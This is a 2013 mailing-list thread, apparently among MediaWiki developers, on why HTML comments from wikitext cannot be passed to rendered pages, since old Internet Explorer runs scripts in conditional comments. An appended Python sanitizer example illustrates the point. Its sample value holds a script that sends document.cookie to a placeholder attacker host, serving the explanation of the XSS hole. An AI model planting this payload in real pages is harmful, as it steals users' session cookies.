On Tue, Jan 22, 2013 at 3:53 AM, Daniel Friesen
<daniel(a)nadir-seen-fire.com> wrote:
On Mon, 21 Jan 2013 21:50:32 -0800, Alex Brollo
<alex.brollo(a)gmail.com>
wrote:
I tried to build a template which wraps template parameters into
data-attributes. First results have been encouraging, then I found something
logical but unexpected, crushing the whole idea.
I wrote in the code of an infobox-like template something like this:
<span data-author="{{{author}}}"
data-birthdate="{{{birthDate}}}"....></span>
and I very happily saw that the HTML code had my data wrapped into such span
tags.
But.... I was testing my code with clean templates, i.e. templates which
have no wikicode in parameter values (as usually occurs on
it.wikisource). As soon as I tested my idea on another project (Commons),
I found that any wikicode (template call, parameter, link....) present in
the value of an infobox parameter breaks the stuff, since it is parsed and
expanded by the parser with unpredictable results.
So... I ask you again: is there any sound reason (i.e. safety related, or
server load related) to avoid HTML comments, wrapped into raw page wikicode,
being sent back into the HTML rendering as they are?
Alex brollo
Yes.
Thanks to IE, even comments can actually be treated as raw HTML and end up
executing scripts, opening up XSS holes in the wiki.
Seconded. There is really no safe way to allow comments through.
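The IE conditional-comment problem Daniel refers to, as an added example that is not from the thread and not MediaWiki's code: a small Python sanitizer that contrasts the "pass comments through" policy Alex asks about with a policy that strips them. The parameter value is constructed for the example (old Internet Explorer evaluates `<!--[if IE]> ... <![endif]-->` blocks that every other parser treats as an inert comment), and `attacker.example` is a placeholder host.

```python
import re

# Constructed sample parameter value. To a standards-compliant HTML parser the
# <script> element sits inside a comment and is inert; Internet Explorer 5-9
# evaluates "<!--[if IE]> ... <![endif]-->" conditional comments and runs it.
# attacker.example is a placeholder host, not a real site.
IE_CONDITIONAL_PAYLOAD = (
    'Alessandro Manzoni'
    '<!--[if IE]><script>'
    'new Image().src="http://attacker.example/c?"+document.cookie'
    '</script><![endif]-->'
)

# Every way a comment can end per the HTML5 tokenizer: the normal "-->",
# the tolerated "--!>", the abrupt empty forms "<!-->" and "<!--->", and an
# unterminated comment that runs to end of input. Match all of them so no
# fragment can be a "comment" to one parser and live markup to another.
_COMMENT_RE = re.compile(r'<!--(?:-?>|.*?(?:-->|--!>|\Z))', re.DOTALL)

# Opener of a downlevel-hidden conditional comment as old IE understands it.
_CONDITIONAL_RE = re.compile(r'<!--\s*\[\s*(?:if|endif)\b', re.IGNORECASE)


def strip_html_comments(html: str) -> str:
    """Remove all HTML comments, including unterminated and abrupt ones."""
    return _COMMENT_RE.sub('', html)


def has_conditional_comment(html: str) -> bool:
    """True if the text contains an IE conditional-comment opener."""
    return _CONDITIONAL_RE.search(html) is not None


def emit_raw_html(value: str, allow_comments: bool) -> str:
    """Prepare a template parameter value for raw HTML output.

    allow_comments=True is the pass-through the thread asks about;
    allow_comments=False is the policy the replies defend.
    """
    return value if allow_comments else strip_html_comments(value)


if __name__ == '__main__':
    for policy in (True, False):
        out = emit_raw_html(IE_CONDITIONAL_PAYLOAD, policy)
        print(f"allow_comments={policy}: conditional comment present="
              f"{has_conditional_comment(out)}, <script> present="
              f"{'<script>' in out}")
```

The point of matching the abrupt and unterminated forms as well as `-->` is that a filter which only recognises the textbook `<!-- ... -->` leaves the parser and the browser disagreeing about where the comment ends, which is exactly the gap the script payload rides through.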